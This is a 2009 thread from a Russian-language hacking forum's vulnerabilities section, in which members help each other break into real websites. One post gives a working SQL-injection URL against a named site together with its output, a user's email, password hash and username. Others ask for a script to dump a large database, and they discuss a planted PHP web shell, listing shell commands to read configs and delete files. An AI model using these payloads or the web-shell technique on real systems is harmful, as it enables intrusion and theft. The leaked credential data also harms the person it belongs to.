HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.02.2009, 20:59
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Saiga  
странно!

-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.

И на все тругие тоше самое ..
Убери пробелы из урла и почитай любую статью по скулям
 
Ответить с цитированием

  #2  
Старый 12.02.2009, 21:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

2 Saiga

http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id, password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1--

piney@panelmonkey.org:2:8d078be183b8a05eb74256465e 9a507ad5c825f3:TPS Pineapple



работай лимитом и всё у тебя получится

Последний раз редактировалось Gorev; 12.02.2009 в 21:03..
 
Ответить с цитированием

  #3  
Старый 12.02.2009, 21:48
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

Это,люди,вот такой код:

require "./start.php";
require $site_dir."/include/security.php";

if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") {
func_header_location("error_message.php?access_den ied&id=3");
}

if (isset($editor_mode))
unset($editor_mode);

x_session_register("editor_mode");

Возможна ли здесь ансет атака,даже если она ничего не даёт :Д
 
Ответить с цитированием

  #4  
Старый 12.02.2009, 22:57
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981

Репутация: 1
По умолчанию

Народ поскажите какой небудь скриптик что бы слить базу под 50K записей.
Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется Извините если попал в offtop
 
Ответить с цитированием

  #5  
Старый 13.02.2009, 06:43
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))
 
Ответить с цитированием

  #6  
Старый 13.02.2009, 09:57
downloader
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978

Репутация: 1
По умолчанию

попугай тама magic_quotes_on я бы залил с радастю снова но больше нету допуска залить... через system и с magic_quotes_on никак нельзя залить шелл? или может скачать все файлы?
 
Ответить с цитированием

  #7  
Старый 13.02.2009, 12:37
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

там *nix?
Если да, то почитай конфиги и где то должна быть админка, етс...

напомню:
ls (ls -lia) --листинг диры
pwd ---текущая дира
cat file.php --открыть файл для просмотра (если не катит так, смотри ниже)
cp file.php file.txt ---ну и потом прям в браузере смотрим сорцы
rm file -- удалить файл (например мещающий хтакцесс)

этих команд, в купе с твоим <? system($_GET[c]) ?> , хватит в 90% случаев.
 
Ответить с цитированием

  #8  
Старый 13.02.2009, 13:55
downloader
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978

Репутация: 1
По умолчанию

тама FreeBSD
 
Ответить с цитированием

  #9  
Старый 13.02.2009, 13:58
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию

фрибсд это никс система
 
Ответить с цитированием

  #10  
Старый 13.02.2009, 19:13
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

запрос не правильно составляешь либо прав не хватает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.